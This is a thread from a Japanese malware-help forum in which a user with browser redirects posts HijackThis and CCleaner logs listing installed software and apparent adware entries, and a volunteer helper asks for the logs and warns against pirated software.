悪代官の伏魔殿掲示板

件名に書いた通りなのですが、ポップアップであったり広告サイトのようなところに強制的に飛ばされたりで困っています。どうしたらいいでしょうか？
以下にログを貼っておきますので確認と対処の方法を教えて頂けませんか？
よろしくお願いします。

C:\Program Files (x86)\Naver\LINE\Line.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe
C:\ProgramData\{021e6b93-a7a5-9558-021e-e6b93a7aae4e}\Battle Network Rockman Exe 3 Black (Japan) (V1.1).exe
C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
c:\program files (x86)\google\chrome\application\chrome.exe
C:\PROGRA~2\SEARCH~1\SearchProtect\bin\cltmng.exe
C:\PROGRA~2\SEARCH~1\UI\bin\cltmngui.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe
C:\Users\ryota\Downloads\HijackThis (1).exe

F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: ExstraSaviings - {78f73e11-e6b2-48a8-88b7-9c9db3ca8dc5} - C:\Program Files (x86)\ExstraSaviings\bW26gfXJvpMiqk.dll
O4 - HKLM\..\Run: [HDAudDeck] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe -r
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [Google Japanese Input Prelauncher] "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [DivXUpdate] "C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
O4 - HKLM\..\Run: [au_WiFi_Connect] "C:\Program Files (x86)\au Wi-Fi接続ツール\au_WiFi_Connect.exe" -x
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [CnsMin] Rundll32.exe C:\Windows\DOWNLO~1\CnsMin.dll,Rundll32
O4 - HKLM\..\Run: [WinCheck] C:\Users\ryota\AppData\Local\03000200-1425075226-0500-0006-000700080009\bnsq55B.exe
O4 - HKCU\..\Run: [ApplicationManager] C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe
O4 - HKCU\..\Run: [Line] "C:\Program Files (x86)\Naver\LINE\Line.exe" --booting
O4 - HKCU\..\Run: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
O4 - HKCU\..\Run: [iFunBox Fast App Install Handler] C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe /tray
O4 - HKCU\..\Run: [OneDrive] "C:\Users\ryota\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
O4 - Startup: Battle Network Rockman Exe 3 Black (Japan) (V1.1).lnk = C:\ProgramData\{021e6b93-a7a5-9558-021e-e6b93a7aae4e}\Battle Network Rockman Exe 3 Black (Japan) (V1.1).exe
O4 - Global Startup: McAfee Security Scan Plus.lnk = C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing)
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O11 - Options group: [!CNS] JWord(日本語キーワード)
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O16 - DPF: {1DC420F0-D89A-40D0-B5CC-92B9AD19A1AC} (HGPluginJP28 Class) - http://down.hangame.co.jp/jp/dist/hgstart/HGPluginJP28.cab
O16 - DPF: {255A2E53-D2E3-42DA-9C1D-36B289B8E18B} (DMMLauncherAx Control) - http://dl.app-netgame.dmm.com/launcher/DMMLauncherAx_32.cab
O16 - DPF: {5082D9B5-5538-4C50-BDB1-C5F44BFB98CC} (HgRunPub Class) - http://down.hangame.co.jp/jp/installer/HgRunPub.cab
O16 - DPF: {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C} (NeffyLauncherCtl Class) - http://dist.cdnetworks.co.jp/cdndist/neffy/NeffyLauncher.cab
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} (Creative Software AutoUpdate Support Package 2) - http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
O16 - DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} (Creative Software AutoUpdate 2) - http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} (Creative Software AutoUpdate Support Package) - http://ccfiles.creative.com/Web/softwareupdate/ocx/121022/CTPID.cab
O16 - DPF: {F8160836-0C11-4CA4-AD87-944542C7BCBD} (PubPlugin Class) - http://down.hangame.co.jp/jp/purple/launcher/PubPlugin.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{0693221B-E6F5-43F7-953D-6A2229EB2054}: NameServer = 60.56.0.135 218.251.89.134
O17 - HKLM\System\CS1\Services\Tcpip\..\{0693221B-E6F5-43F7-953D-6A2229EB2054}: NameServer = 60.56.0.135 218.251.89.134
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O20 - AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC32Loader.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: auWifiConnectSvc - Unknown owner - C:\Program Files (x86)\au Wi-Fi接続ツール\auWifiConnectSvc.exe (file missing)
O23 - Service: Search Protect Service (CltMngSvc) - Client Connect LTD - C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: Freemake Improver - Freemake - C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe
O23 - Service: Google Japanese Input Cache Service (GoogleIMEJaCacheService) - Google Inc. - C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\WINDOWS\system32\IEEtwCollector.exe (file missing)
O23 - Service: Intel(R) HD Graphics Control Panel Service (igfxCUIService1.0.0.0) - Unknown owner - C:\WINDOWS\system32\igfxCUIService.exe (file missing)
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: McAfee Security Scan Component Host Service (McComponentHostService) - McAfee, Inc. - C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: Tango Core Service (TangoCoreService) - Unknown owner - C:\Program Files (x86)\Siemens\Common\TangoCoreService.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @oem4.inf,%ViaKaraokeSrv.SvcDesc%;VIA Karaoke digital mixer Service (VIAKaraokeService) - Unknown owner - C:\WINDOWS\system32\viakaraokesrv.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

こんばんは、IVNOと申します。
とりあえずこれだけは先にお伝えしておきますね。
不正入手ソフトウェアには手を出さない方が良いですよ。
それで入手したものは全削除を強く推奨します。
それらを残していると再感染の危険性がありますので。
それでは早速ですが、まずは調査のため利用規約のご確認とログの取得をしていただいております。
まずは以下の利用規約で違反事項がないかどうかご確認をお願いいたします。

http://akumaden.web.fc2.com/

違反事項がないようでしたら問題ございませんので、以下URLよりHJTとCCのログをそれぞれ回収し、
回収された2つのログを両方とも貼り付けてご連絡をお願いいたします。

http://akumaden.web.fc2.com/prepare.html

ご返信ありがとうございます。
まず自分があまりPC環境に不慣れなことはお伝えしておきます。
不正入手ソフトウェアに関しては自分はあまり関与しておらずわからないのが現状です。
家族の共有PCですのでそういったソフトも削除対象として見て頂いて構いません。よろしくお願いします。
以下　ログでございます。

HJT

C:\Program Files (x86)\Naver\LINE\Line.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe
C:\ProgramData\{021e6b93-a7a5-9558-021e-e6b93a7aae4e}\Battle Network Rockman Exe 3 Black (Japan) (V1.1).exe
C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
c:\program files (x86)\google\chrome\application\chrome.exe
C:\PROGRA~2\SEARCH~1\SearchProtect\bin\cltmng.exe
C:\PROGRA~2\SEARCH~1\UI\bin\cltmngui.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe
C:\Users\ryota\DOWNLOADS\HijackThis (1).exe

F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: ExstraSaviings - {78f73e11-e6b2-48a8-88b7-9c9db3ca8dc5} - C:\Program Files (x86)\ExstraSaviings\bW26gfXJvpMiqk.dll
O4 - HKLM\..\Run: [HDAudDeck] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe -r
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [Google Japanese Input Prelauncher] "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [DivXUpdate] "C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
O4 - HKLM\..\Run: [au_WiFi_Connect] "C:\Program Files (x86)\au Wi-Fi接続ツール\au_WiFi_Connect.exe" -x
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [CnsMin] Rundll32.exe C:\Windows\DOWNLO~1\CnsMin.dll,Rundll32
O4 - HKLM\..\Run: [WinCheck] C:\Users\ryota\AppData\Local\03000200-1425075226-0500-0006-000700080009\bnsq55B.exe
O4 - HKCU\..\Run: [ApplicationManager] C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe
O4 - HKCU\..\Run: [Line] "C:\Program Files (x86)\Naver\LINE\Line.exe" --booting
O4 - HKCU\..\Run: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
O4 - HKCU\..\Run: [iFunBox Fast App INSTALL Handler] C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe /tray
O4 - HKCU\..\Run: [OneDrive] "C:\Users\ryota\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
O4 - Startup: Battle Network Rockman Exe 3 Black (Japan) (V1.1).lnk = C:\ProgramData\{021e6b93-a7a5-9558-021e-e6b93a7aae4e}\Battle Network Rockman Exe 3 Black (Japan) (V1.1).exe
O4 - Global Startup: MCAFEE SECURITY SCAN Plus.lnk = C:\Program Files\MCAFEE SECURITY SCAN\3.8.150\SSScheduler.exe
O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing)
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\INTERNET EXPLORER\SkypeIEPlugin.dll
O11 - Options group: [!CNS] JWord(日本語キーワード)
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O16 - DPF: {1DC420F0-D89A-40D0-B5CC-92B9AD19A1AC} (HGPluginJP28 Class) - http://down.hangame.co.jp/jp/dist/hgstart/HGPluginJP28.cab
O16 - DPF: {255A2E53-D2E3-42DA-9C1D-36B289B8E18B} (DMMLauncherAx Control) - http://dl.app-netgame.dmm.com/launcher/DMMLauncherAx_32.cab
O16 - DPF: {5082D9B5-5538-4C50-BDB1-C5F44BFB98CC} (HgRunPub Class) - http://down.hangame.co.jp/jp/installer/HgRunPub.cab
O16 - DPF: {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C} (NeffyLauncherCtl Class) - http://dist.cdnetworks.co.jp/cdndist/neffy/NeffyLauncher.cab
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} (Creative Software AutoUpdate Support Package 2) - http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
O16 - DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} (Creative Software AutoUpdate 2) - http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} (Creative Software AutoUpdate Support Package) - http://ccfiles.creative.com/Web/softwareupdate/ocx/121022/CTPID.cab
O16 - DPF: {F8160836-0C11-4CA4-AD87-944542C7BCBD} (PubPlugin Class) - http://down.hangame.co.jp/jp/purple/launcher/PubPlugin.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{0693221B-E6F5-43F7-953D-6A2229EB2054}: NameServer = 60.56.0.135 218.251.89.134
O17 - HKLM\System\CS1\Services\Tcpip\..\{0693221B-E6F5-43F7-953D-6A2229EB2054}: NameServer = 60.56.0.135 218.251.89.134
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\INTERNET EXPLORER\SkypeIEPlugin.dll
O20 - AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC32Loader.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: auWifiConnectSvc - Unknown owner - C:\Program Files (x86)\au Wi-Fi接続ツール\auWifiConnectSvc.exe (file missing)
O23 - Service: Search Protect Service (CltMngSvc) - Client Connect LTD - C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: Freemake Improver - Freemake - C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe
O23 - Service: Google Japanese Input Cache Service (GoogleIMEJaCacheService) - Google Inc. - C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\WINDOWS\system32\IEEtwCollector.exe (file missing)
O23 - Service: Intel(R) HD Graphics Control Panel Service (igfxCUIService1.0.0.0) - Unknown owner - C:\WINDOWS\system32\igfxCUIService.exe (file missing)
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: McAfee Security Scan Component Host Service (McComponentHostService) - McAfee, Inc. - C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: Tango Core Service (TangoCoreService) - Unknown owner - C:\Program Files (x86)\Siemens\Common\TangoCoreService.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @oem4.inf,%ViaKaraokeSrv.SvcDesc%;VIA Karaoke digital mixer Service (VIAKaraokeService) - Unknown owner - C:\WINDOWS\system32\viakaraokesrv.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

CC
AAlllSaveer "" 2015/03/04
Adobe AIR Adobe Systems Incorporated 2014/11/13 3.6.0.6090
Adobe Flash Media Live Encoder 3.2 Adobe Systems Incorporated 2012/10/31 15.8 MB 3.2.0
Adobe Flash Player 16 NPAPI Adobe Systems Incorporated 2015/02/05 6.00 MB 16.0.0.305
Adobe Reader XI (11.0.10) - Japanese Adobe Systems Incorporated 2015/02/08 206 MB 11.0.10
AdPunisher AdPunisher 2014/02/22
Age of Empires II: HD Edition Hidden Path Entertainment, Ensemble Studios 2014/11/13
AmaRecTV Live 2014/11/13
AmvVideoCodec 2014/11/13
Apple Application Support Apple Inc. 2014/10/03 93.4 MB 3.0.6
Apple Mobile Device Support Apple Inc. 2014/10/03 21.6 MB 8.0.0.23
Apple Software Update Apple Inc. 2012/10/31 2.38 MB 2.1.3.127
ApplicationManager 2011.4.27.209 kingsoft 2014/11/13 2011.4.27.209
ArcheAge XLGAMES 2014/08/10
ArcheAge GameOn 2014/11/13 1
au Wi-Fi接続ツール 株式会社 ネットビジョン 2014/11/13
CCleaner Piriform 2015/03/20 5.03
Common GameOn 2014/11/13 46603608
Craving Explorer Version 1.6.4 T-Craft 2014/08/06 26.6 MB 1.6.4.0
Creative システム インフォメーション Creative Technology Limited 2014/11/13 1.10
CutterFunc CutterFunc 2014/02/25
DAEMON Tools Lite Disc Soft Ltd 2014/11/13 4.49.1.0356
DC-Bass Source 1.3.0 2014/11/13
DirectVobSub 2.40.4209 MPC-HC Team 2014/02/15 2.10 MB 2.40.4209
DiscounnTExeteensii "" 2015/03/04
DivXセットアップ DivX, LLC 2014/11/13 2.6.1.90
eo接続ツール Siemens 2012/10/31 2.0
Explzh for Windows (64bit) pon software 2014/11/13 7.1.7.0
ExstraSaviings "" 2015/03/06
ffdshow v1.1.4399 [2012-03-22] 2014/02/15 13.5 MB 1.1.4399.0
FlvPlayer 2014/11/13 ${VERSION}
Freemake Audio Converter バージョン 1.1.0 Ellora Assets Corporation 2014/06/29 49.4 MB 1.1.0
Gamepot Web実行環境 Gamepot 2012/12/04 308 KB 1.1.0
Google Chrome Google Inc. 2014/05/10 34.0.1847.131
Google 日本語入力 Google Inc. 2014/01/07 83.0 MB 1.13.1641.0
Hangame 2014/11/13
HiJackThis Trend Micro 2013/08/24 369 KB 1.0.0
Hounds DMM 2014/05/10 1.0.0
iFunbox (v2.94.2520.758), iFunbox DevTeam 2015/02/27 23.3 MB v2.94.2520.758
Intel(R) Management Engine Components Intel Corporation 2012/09/20 8.1.0.1281
Intel(R) Processor Graphics Intel Corporation 2012/09/20 9.17.10.2849
Intel(R) SDK for OpenCL - CPU Only Runtime Package Intel Corporation 2014/11/13 2.0.0.37149
Isaverr "" 2015/03/04
iTunes Apple Inc. 2014/10/03 219 MB 11.4.0.18
JWord(日本語キーワード) 2014/11/13
KDrive kingsoft 2014/11/13 1.21.0.1584
